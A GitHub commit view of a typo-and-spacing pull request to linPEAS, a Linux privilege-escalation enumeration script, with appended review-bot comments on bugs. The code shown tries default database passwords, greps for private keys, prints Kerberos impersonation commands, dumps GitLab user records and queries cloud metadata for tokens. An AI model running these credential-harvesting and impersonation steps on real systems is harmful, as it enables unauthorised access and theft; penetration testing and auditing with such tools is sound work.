Merge pull request #375 from galoget/master

Fix typos, grammar and spacing
Carlos Polop 2023-07-31 16:56:43 +02:00 committed by GitHub
commit 9861259bca
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
8 changed files with 103 additions and 97 deletions


@ -6,12 +6,12 @@ from .src.yamlGlobals import FINAL_FAT_LINPEAS_PATH, FINAL_LINPEAS_PATH, TEMPORA
import os
import stat
#python3 -m builder.linpeas_builder
# python3 -m builder.linpeas_builder
def main():
# Load configuration
ploaded = PEASLoaded()
# Build temporary linpeas_base.sh file
# Build temporary linpeas_base.sh file
lbasebuilder = LinpeasBaseBuilder()
lbasebuilder.build()
@ -20,7 +20,7 @@ def main():
lbuilder.build()
lbuilder.write_linpeas(FINAL_FAT_LINPEAS_PATH)
lbuilder.write_linpeas(FINAL_LINPEAS_PATH, rm_startswith="FAT_LINPEAS")
os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file
os.remove(TEMPORARY_LINPEAS_BASE_PATH) # Remove the built linpeas_base.sh file
st = os.stat(FINAL_FAT_LINPEAS_PATH)
os.chmod(FINAL_FAT_LINPEAS_PATH, st.st_mode | stat.S_IEXEC)
@ -30,4 +30,4 @@ def main():
if __name__ == "__main__":
main()
main()
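Review bot: `os.remove(TEMPORARY_LINPEAS_BASE_PATH)` runs only after `lbuilder.build()` and both `write_linpeas` calls have succeeded, so any exception on that path leaves the generated linpeas_base.sh behind in the tree; wrapping the build-and-write steps in `try: ... finally: os.remove(TEMPORARY_LINPEAS_BASE_PATH)` (with an `os.path.exists` guard for the case where the base build itself failed) makes the cleanup unconditional. Whether a stale leftover matters depends on how LinpeasBaseBuilder treats an existing file, which is not visible here. The `chmod` adds only `stat.S_IEXEC` (owner execute); if the published script is meant to be runnable by other accounts, `stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH` is the usual set — confirm the intent. Parts of `main()` fall between the three hunks and are outside this view.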


@ -16,7 +16,7 @@ containerCheck() {
containerType="docker\n"
fi
# Are we inside kubenetes?
# Are we inside kubernetes?
if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null ||
grep -qai kubepods /proc/self/cgroup 2>/dev/null; then
@ -257,7 +257,7 @@ else
if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi
fi
#If docker
# If docker
if echo "$containerType" | grep -qi "docker"; then
print_2title "Docker Container details"
inDockerGroup
@ -279,7 +279,7 @@ if echo "$containerType" | grep -qi "docker"; then
fi
fi
#If token secrets mounted
# If token secrets mounted
if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then
print_2title "Listing mounted tokens"
print_info "https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod"
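Review bot: The kubernetes test under the corrected comment relies solely on a `kubepod` string in /proc/1/cgroup or /proc/self/cgroup; on a cgroup v2 host with cgroup namespaces those files typically show only `0::/` inside a container, so a pod can go undetected unless another signal is checked elsewhere in `containerCheck` (the function starts before this hunk and continues past it). A cheap additional signal is the projected service-account mount or the injected env var, e.g. extending the condition with `|| [ -d /var/run/secrets/kubernetes.io/serviceaccount ] || [ "$KUBERNETES_SERVICE_HOST" ]`. The later "token secrets mounted" block only partly compensates, since it keys on a `secret` tmpfs mount rather than setting `containerType`.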


@ -150,9 +150,9 @@ if [ "$is_gcp" = "Yes" ]; then
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
# GCP Enumeration
if [ "$gcp_req" ]; then
print_2title "Google CLoud Platform Enumeration"
print_2title "Google Cloud Platform Enumeration"
print_info "https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security"
## GC Project Info
@ -236,7 +236,7 @@ if [ "$is_gcp" = "Yes" ]; then
fi
fi
# AWS ECS Enumeration
if [ "$is_aws_ecs" = "Yes" ]; then
print_2title "AWS ECS Enumeration"
@ -270,6 +270,7 @@ if [ "$is_aws_ecs" = "Yes" ]; then
fi
fi
# AWS EC2 Enumeration
if [ "$is_aws_ec2" = "Yes" ]; then
print_2title "AWS EC2 Enumeration"
@ -334,6 +335,7 @@ if [ "$is_aws_ec2" = "Yes" ]; then
fi
fi
# AWS Lambda Enumeration
if [ "$is_aws_lambda" = "Yes" ]; then
print_2title "AWS Lambda Enumeration"
printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME
@ -346,6 +348,7 @@ if [ "$is_aws_lambda" = "Yes" ]; then
printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
fi
# AWS Codebuild Enumeration
if [ "$is_aws_codebuild" = "Yes" ]; then
print_2title "AWS Codebuild Enumeration"
@ -371,6 +374,7 @@ if [ "$is_aws_codebuild" = "Yes" ]; then
fi
fi
# DO Droplet Enumeration
if [ "$is_do" = "Yes" ]; then
print_2title "DO Droplet Enumeration"
@ -398,11 +402,12 @@ if [ "$is_do" = "Yes" ]; then
fi
fi
# IBM Cloud Enumeration
if [ "$is_ibm_vm" = "Yes" ]; then
print_2title "IBM Cloud Enumeration"
if ! [ "$IBM_TOKEN" ]; then
echo "Couldn't get the metdata token:("
echo "Couldn't get the metadata token:("
else
TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
@ -436,12 +441,13 @@ if [ "$is_ibm_vm" = "Yes" ]; then
fi
# Azure VM Enumeration
if [ "$is_az_vm" = "Yes" ]; then
print_2title "Azure VM Enumeration"
HEADER="Metadata:true"
URL="http://169.254.169.254/metadata"
API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
API_VERSION="2021-12-13" # https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
az_req=""
if [ "$(command -v curl)" ]; then
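Review bot: The `Event data:` line in the AWS Lambda block fetches `/2018-06-01/runtime/invocation/next`, which, if I read the Runtime API correctly, is the long-poll the language runtime itself uses to receive the next event: called from inside a running function it blocks until another invocation arrives and then consumes that event, so the real handler never sees it and the function can hang until its timeout. That is not a read-only probe like the other metadata requests in this file, so it deserves at least a warning comment, e.g. `# WARNING: invocation/next blocks until an event arrives and consumes it from the runtime queue`, and arguably a gate such as `[ "$EXTRA_CHECKS" ]` so it is opt-in. The `is_aws_lambda` block starts before this hunk.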


@ -45,7 +45,7 @@ if [ "$MACPEAS" ]; then
done
fi
#-- SI) Mysql version
#-- SI) MySQL version
if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; then
print_2title "MySQL version"
mysql --version 2>/dev/null || echo_not_found "mysql"
@ -56,7 +56,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ];
echo ""
echo ""
#-- SI) Mysql connection root/root
#-- SI) MySQL connection root/root
print_list "MySQL connection using default root/root ........... "
mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null)
if [ "$mysqlconnect" ]; then
@ -65,7 +65,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ];
else echo_no
fi
#-- SI) Mysql connection root/toor
#-- SI) MySQL connection root/toor
print_list "MySQL connection using root/toor ................... "
mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null)
if [ "$mysqlconnect" ]; then
@ -74,7 +74,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ];
else echo_no
fi
#-- SI) Mysql connection root/NOPASS
#-- SI) MySQL connection root/NOPASS
mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null)
print_list "MySQL connection using root/NOPASS ................. "
if [ "$mysqlconnectnopass" ]; then
@ -85,7 +85,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ];
echo ""
fi
#-- SI) Mysql credentials
#-- SI) MySQL credentials
if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then
print_2title "Searching mysql credentials and exec"
printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do
@ -144,7 +144,7 @@ peass{PostgreSQL}
#-- SI) PostgreSQL brute
if [ "$TIMEOUT" ] && [ "$(command -v psql)" ] || [ "$DEBUG" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it.
#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
# Checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ "
if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
else echo_no
@ -239,7 +239,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null)
privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null)
else
privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout
privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) # If there is tons of files linpeas gets frozen here without a timeout
privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null)
fi
else
@ -352,8 +352,8 @@ if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PST
printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do
if [ "$l" ] && echo "$l" | grep -q "@"; then
printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g"
#kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid
#We could also try to create a new user or modify a password, but I'm not user if linpeas should do that
# kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid
# We could also try to create a new user or modify a password, but I'm not user if linpeas should do that
fi
done
elif echo "$f" | grep -q krb5.conf; then
@ -533,7 +533,7 @@ fi
##-- SI) Gitlab
if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then
print_2title "Searching GitLab related files"
#Check gitlab-rails
# Check gitlab-rails
if [ "$(command -v gitlab-rails)" ]; then
echo "gitlab-rails was found. Trying to dump users..."
gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED},"
@ -546,7 +546,7 @@ if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$
echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'"
echo ""
fi
#Check gitlab files
# Check gitlab files
printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do
if echo $f | grep -q secrets.yml; then
echo "Found $f" | sed "s,$f,${SED_RED},"
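Review bot: The comment kept on the `/etc` grep in the no-timeout branch reads as if that line were missing a timeout, whereas, judging from the sibling branch above it that uses `timeout 40` on four directories, its purpose seems to be to explain why only `/etc` and `$HOME/.ssh` are searched here; rewording removes the ambiguity, e.g. `# No 'timeout' binary available: search only /etc and ~/.ssh, a grep over /root or /mnt could hang linpeas`. The inner condition that selects this branch is outside the hunk, so confirm that is what it tests. The Kerberos hunk in this same file still carries `impersoanted` and `I'm not user if` (should be `impersonated` and `I'm not sure if`), which this typo pass missed.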


@ -24,15 +24,15 @@ fi
suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null)
for s in $suids_files; do
s=$(ls -lahtr "$s")
#If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
# If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
if echo "$s" | grep -qE "^total"; then break; fi
sname="$(echo $s | awk '{print $9}')"
if [ "$sname" = "." ] || [ "$sname" = ".." ]; then
true #Don't do nothing
true # Don't do nothing
elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED},"
elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then # If write permision, win found (no check exploits)
echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
else
c="a"
@ -55,12 +55,12 @@ for s in $suids_files; do
$STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do
sline_first="$(echo "$sline" | cut -d ' ' -f1)"
if echo "$sline_first" | grep -qEv "$cfuncs"; then
if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then # If a path
if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then # And modifiable
printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
fi
else #If not a path
if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary
if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then # Check if existing binary
printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
fi
fi
@ -105,7 +105,7 @@ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sud
sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null)
for s in $sgids_files; do
s=$(ls -lahtr "$s")
#If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
# If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
if echo "$s" | grep -qE "^total";then break; fi
sname="$(echo $s | awk '{print $9}')"
@ -113,7 +113,7 @@ for s in $sgids_files; do
true #Don't do nothing
elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED},"
elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then # If write permision, win found (no check exploits)
echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
else
c="a"
@ -136,12 +136,12 @@ for s in $sgids_files; do
$STRINGS "$sname" | sort | uniq | while read sline; do
sline_first="$(echo $sline | cut -d ' ' -f1)"
if echo "$sline_first" | grep -qEv "$cfuncs"; then
if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then # If a path
if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then # And modifiable
printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n"
fi
else #If not a path
if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary
else # If not a path
if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then # Check if existing binary
printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n"
fi
fi
@ -456,7 +456,7 @@ fi
if ! [ "$IAMROOT" ]; then
print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files"
#In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all
# In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all
obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
printf "%s\n" "$obmowbe" | while read entry; do
if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
@ -488,4 +488,4 @@ if ! [ "$IAMROOT" ]; then
fi
done
echo ""
fi
fi
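Review bot: Both loops re-derive the file name from `ls` output with `awk '{print $9}'`, and `for s in $suids_files` splits the find results on whitespace, so a SUID/SGID binary under a path containing a space is looked up under a truncated name and the `-O`/`-w` checks and `$STRINGS` analysis silently run against the wrong path; keeping the original path avoids both problems, e.g. `printf "%s\n" "$suids_files" | while read -r spath; do`, `s=$(ls -lahtr "$spath")`, `sname="$spath"`. The rewritten comment about a leading `total` line still describes an xargs pipeline the loop no longer uses, and with `find -type f` a per-file `ls` never prints that header, so the `break` guard is dead; the SGID copy of the comment also still says "no SUID bin". `permision` remains misspelled on the two write-check lines.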


@ -11,7 +11,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
for f in $(find "$d" -name "*.sh" -o -name "*.sh.*" 2>/dev/null); do
if ! [ "$IAMROOT" ] && [ -O "$f" ]; then
echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED},"
elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits)
elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then # If write permision, win found (no check exploits)
echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"
else
echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},";
@ -80,14 +80,14 @@ find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/
echo ""
##-- IF) Writable log files
if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below
if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then # 3.18.0 and below
print_2title "Writable log files (logrotten) (limit 50)"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation"
logrotate --version 2>/dev/null || echo_not_found "logrotate"
lastWlogFolder="ImPOsSiBleeElastWlogFolder"
logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50)
printf "%s\n" "$logfind" | while read log; do
if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found
if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then # Only print info if something interesting found
if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC;
elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case
elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log";
@ -164,7 +164,7 @@ if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then
SQLITEPYTHON=""
echo ""
printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd
if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then # If readable and filecmd and sqlite, or readable and not filecmd
if [ "$(command -v sqlite3 2>/dev/null)" ]; then
tables=$(sqlite3 $f ".tables" 2>/dev/null)
#printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
@ -186,7 +186,7 @@ if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then
else
columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null)
fi
#Check found columns for interesting fields
# Check found columns for interesting fields
INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt")
if [ "$INTCOLUMN" ]; then
printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g"
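Review bot: The Python fallback in the last hunk builds source text by interpolating `$f` and `$t` into the `-c` string, so a planted database whose path or table name contains a single quote breaks out of the SQL literal and runs arbitrary Python as the account running linPEAS — a cheap trap for a defender to leave on a host where the tool is expected. Pass both values as arguments and bind them instead, e.g. `$SQLITEPYTHON -c "import sqlite3,sys; print(sqlite3.connect(sys.argv[1]).execute('SELECT sql FROM sqlite_master WHERE type!=? AND sql NOT NULL AND name=?', ('meta', sys.argv[2])).fetchall()[0][0])" "$f" "$t"`; the `sqlite3 $f ".tables"` call above should quote `"$f"` for the tamer word-splitting reason. Separately, the inner logrotate version test on the `Writable:$RED` line (`grep -qE ' 1| 2| 3.1'`) disagrees with the outer gate's regex — it misses 3.2–3.9 — so the red highlight is inconsistent with the block's own entry condition. The `while read f` loop and the table loop that defines `$t` start outside this hunk.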


@ -51,7 +51,7 @@ ITALIC="${C}[3m"
# --) SUPERFAST - FAST & do not search for special filaes in all the folders
if uname 2>/dev/null | grep -q 'Darwin' || /usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else MACPEAS=""; fi
FAST="1" #By default stealth/fast mode
FAST="1" # By default stealth/fast mode
SUPERFAST=""
DISCOVERY=""
PORTS=""
@ -68,9 +68,9 @@ EXTRA_CHECKS=""
REGEXES=""
PORT_FORWARD=""
THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")"
[ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2
[ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2
[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #It THREADS is not a number, put number 2
[ -z "$THREADS" ] && THREADS="2" # If THREADS is empty, put number 2
[ -n "$THREADS" ] && THREADS="2" # If THREADS is null, put number 2
[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" # It THREADS is not a number, put number 2
HELP=$GREEN"Enumerate and search Privilege Escalation vectors.
${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors.
${GREEN} Checks:
@ -124,7 +124,7 @@ while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do
e) EXTRA_CHECKS="1";;
r) REGEXES="1";;
f) SEARCH_IN_FOLDER=$OPTARG;
if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then #Make sure firmware folder ends with "/"
if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then # Make sure firmware folder ends with "/"
SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/";
fi;
ROOT_FOLDER=$SEARCH_IN_FOLDER;
@ -319,7 +319,7 @@ mounted=$( (cat /proc/self/mountinfo || cat /proc/1/mountinfo) 2>/dev/null | cut
if ! [ "$mounted" ]; then
mounted=$( (mount -l || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}')
fi
if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi #Don't let any blacklist to be empty
if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi # Don't let any blacklist to be empty
mountG="swap|/cdrom|/floppy|/dev/shm"
notmounted=$(cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|')"ImPoSSssSiBlEee"
mountpermsB="\Wsuid|\Wuser|\Wexec"
@ -329,7 +329,7 @@ rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmt
groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)"
groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)"
knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html
knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' # https://www.togaware.com/linux/survivor/Standard_Groups.html
mygroups=$(groups 2>/dev/null | tr " " "|")
# Default Binaries List
@ -338,7 +338,7 @@ sidG2="/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnomet
sidG3="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$"
sidG4="/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/VBoxHeadless$|/VBoxNetAdpCtl$|/VBoxNetDHCP$|/VBoxNetNAT$|/VBoxSDL$|/VBoxVolInfo$|/VirtualBoxVM$|/vmstat$|/vmware-authd$|/vmware-user-suid-wrapper$|/vmware-vmx$|/vmware-vmx-debug$|/vmware-vmx-stats$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$"
#Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION
# Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION
sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\
/at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\
/abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22
